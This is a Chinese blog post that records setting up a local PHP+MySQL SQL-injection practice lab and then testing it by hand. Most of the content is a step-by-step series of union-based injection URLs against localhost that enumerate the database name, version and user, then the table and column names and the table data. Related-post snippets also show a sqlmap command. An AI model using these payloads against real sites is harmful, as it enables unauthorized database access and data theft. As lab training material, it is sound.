php mysql注入测试工具_php+mysql注入环境搭建及测试(上)

最新推荐文章于 2023-12-01 23:06:44 发布
最新推荐文章于 2023-12-01 23:06:44 发布
阅读量196 收藏
点赞数
文章标签: php mysql注入测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39944233/article/details/114355742
版权

最近在观看小迪的第十三期视频,从里面学到了很多有关渗透方面的知识,弄懂了一些基础的mysql注入原理。同时记录下学习渗透的一些方法。

php+mysql注入环境搭建需要资料如下:

链接:http://pan.baidu.com/s/1kV746Dx 密码:026d

1.安装phpmystudy

自定义安装好phpmystudy,启动(运行phpmystudy)

2.编程一个注入页面(下载好的sql.php)

在phpmystudy安装路径下WWW目录创建一下文件夹test,

然后把下载好的sql.php复制一份到test下。

3.数据接受(创建数据库,注入传递参数到数据库)

http://127.0.0.1/phpmyadmin/           用户名密码都是root

创建一个表列数据,接受传递参数查询数据库。(我这里直接下数据库test下,创建一张biao表)

CREATE TABLE IF NOT EXISTS `biao` (  `id` int(10) NOT NULL,  `title` varchar(1000) NOT NULL,  `text` varchar(1000) NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=GBK;

INSERT INTO `biao` (`id`, `title`, `text`) VALUES(1,'渗透注入','本地搭建注入环境')

032fce9eca01de36dfda8edfcf5e2c3d.png

cb627e4f8e12c349c819944d8dd425a2.png

好了,到此php+mysql注入环境搭建完成。

测试:

传递的参数?i=1

http://127.0.0.1/test/sql.php?i=1

195550e9226dfd92cbfca201fe62c6cf.png

检测是否有注入 :and 1=1正常 and 1=2不正常

934b853f95369ba35efba42eb1ed5a27.png

424be09534a0ddc7432a41ee53a051c9.png

猜解字段数:http://127.0.0.1/test/sql.php?i=1 and  1=1  order by 3  (3正常,4不正常,字段数为3)

a6706ea7bb5add6a41dc6146d484737a.png

猜解数据库名:http://127.0.0.1/test/sql.php?i=1 and 1=1  union select 1,2,3

d127d0da33f7e0033301b32e7ef4ae6e.png

获取数据库信息:

数据库名 database()

数据库版本 version()

数据库用户 user()操作系统 @@version_compile_os

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select database(),version(),user()

99012cabb5a9bf59fba2c34ff703c0de.png

得到数据库为test,用户为root,数据库版本5.5.47

查询test(使用小葵多功能转换工具得到hex编码)下的表名信息:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select table_name,2,3 from information_schema.tables where table_schema=0x74657374

ce5eaa278b307c183b72b46ae83b36b8.png

查询biao(使用小葵多功能转换工具得到hex编码)下的列名信息:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select column_name,2,3 from information_schema.columns where table_name=0x6269616F

6a30737ecf222baafaa1e881ba3ba666.png

591dc66b33dfeaa121c71131bf48abc8.png

直接获取biao表名下的title列名的数据:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select title,2,3 from test.biao

64eceb96f87d166c2ccb2367bbd2cde3.png

weixin_39944233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php mysql注入靶机_六步骤活用SQLMap(以testphp.vulnweb.com为测试靶机)
weixin_42477505的博客
02-02 1078
1、搭建Python 2.7.X 和SQLmap环境;2、使用web扫描工具(如ZAP等)找到SQL的可能注入点:“http://testphp.vulnweb.com/artists.php?artist=1”;3、使用sqlmap 获取当前数据库名称sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-...
php+mysql注入环境搭建测试(上)-附件资源
03-05
php+mysql注入环境搭建测试(上)-附件资源
SQL注入前置知识-PhpStudy环境搭建+MySQL基础+PHP操作数据库
T1ngSh0w的博客
09-11 1154
SQL注入前置知识-PHP+MySQL集成环境搭建+MySQL基础+PHP操作数据库
php+mysql注入环境搭建测试(上)
Rosefinch
07-18 3577
最近在观看小迪的第十三期视频,从里面学到了很多有关渗透方面的知识,弄懂了一些基础的mysql注入原理。同时记录下学习渗透的一些方法。php+mysql注入环境搭建需要资料如下:链接:http://pan.baidu.com/s/1kV746Dx 密码:026d1.安装phpmystudy自定义安装好phpmystudy,启动(运行phpmystudy)2.编程一个注入页面(下载好的sql.php)...
php+mysql搭建一个简单的sql注入平台
qq490765184的博客
08-19 2641
一、环境搭建 环境我使用的XAMPP,搭建phpmysql环境非常简单。 存在问题:XAMPP中的phpMyAdmin没法使用,没法直接利用phpMyAdmin进行表的创建。 本机环境:win7 x64 +IE8二、手动在MySql中创建表     说明:使用XAMPP创建的mysql数据库是一个root密码为空的帐户,利用如下方式进行后,就可以直接操作     1.mysql的数据库的连接:...
SQL手工注入漏洞测试(MySQL数据库-字符型)-墨者
weoptions的博客
12-01 1737
———靶场专栏———分享我的解题过程
搭建WAMP网站教程(Windows+Apache+MySQL+PHP
柠檬i的博客
11-05 4389
不使用注入phpstudy等一键工具,一个一个安装包进行安装,以此来加深对wamp各个组件之间的关系的理解。
SQL注入PHP-MySQL实现手工注入-数字型
CSDN
10-23 7120
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单...
SQL注入系列之环境搭建(二)----PHP+Mysql注入环境搭建
fendo
12-29 7009
一、手写一个带sql注入的页面 php+mysql注入页面编写步骤 1.接受参数 2.连接数据库 3.组合sql语句 4.执行sql语句并返回显示 新建一个sqltest.php的文件、并添加以下代码 //fendo数据库root用户连接mysql数据库,操作user表 <? $id= $_GET['x'];//接受get传递的参数名x的值并赋值给变量
万能密码的SQL注入漏洞其PHP环境搭建及代码详解+防御手段
Zeker62的博客
09-01 1400
目录环境搭建session会话环境搭建代码创建数据库脚本登录界面html:查询数据库是否为正确的账号密码php代码连接数据库php代码:注销登录代码(即关闭session会话)登录成功欢迎界面:万能密码漏洞剖析万能密码攻击防护使用正则表达式限制用户输入:使用PHP转义函数:转义函数的弊端MySQLi 参数化查询环境搭建 这个渗透环境搭建有以下几点 基于session的会话 登录界面 登录成功...
安卓一键搭建php环境和手机mysql注入演示
08-12
php的安装和mysql注入演示,什么是mysql注入,怎么搭建php环境
chatroom-based-on-PHP-and-MySQL.rar_chat php mysql_基于php Mysql_基
09-24
【描述】:这个项目展示了如何利用PHP作为服务器端脚本语言,与MySQL数据库紧密结合,来创建一个实时的、用户友好的在线聊天环境。用户可以注册新账号,通过登录系统进入聊天室,与其他在线用户进行交流,并且能够...
PHP+Tomact+MySQL蜂蜜动态网站搭建.rar
10-27
- **环境配置**:首先,需要在服务器或本地计算机上安装Apache Tomcat、PHP解释器(如PHP-FPM)以及MySQL服务器。 - **数据库设计**:设计数据库结构,创建所需的表和字段,定义好数据类型和约束。 - **PHP编程**...
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
07-26
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
b278视频及游戏管理平台-springboot+vue.zip(可运行源码+sql文件+)
07-26
视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。
大模型应用-为Ollma开发的简单的HTML网页UI应用-附项目源码-优质项目实战.zip
07-26
大模型应用_为Ollma开发的简单的HTML网页UI应用_附项目源码_优质项目实战
基于JAVA局域网监听软件的设计与开发(源代码+论文).rar
07-26
基于JAVA局域网监听软件的设计与开发(源代码+论文).rar
小程序-光影娱乐带后台(源码).zip
最新发布
07-26
小程序-光影娱乐带后台(源码).zip
对Apache+PHP+MySQL环境的SQL注入攻击
06-06
在攻击实现部分,你可以选择使用SQL注入攻击手段,根据前期作业的准备,对自己搭建的Apache+PHP+MySQL环境进行实施,模拟SQL注入攻击的过程。可以先进行信息搜集,了解网站的结构与后台数据库的相关信息,然后确定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值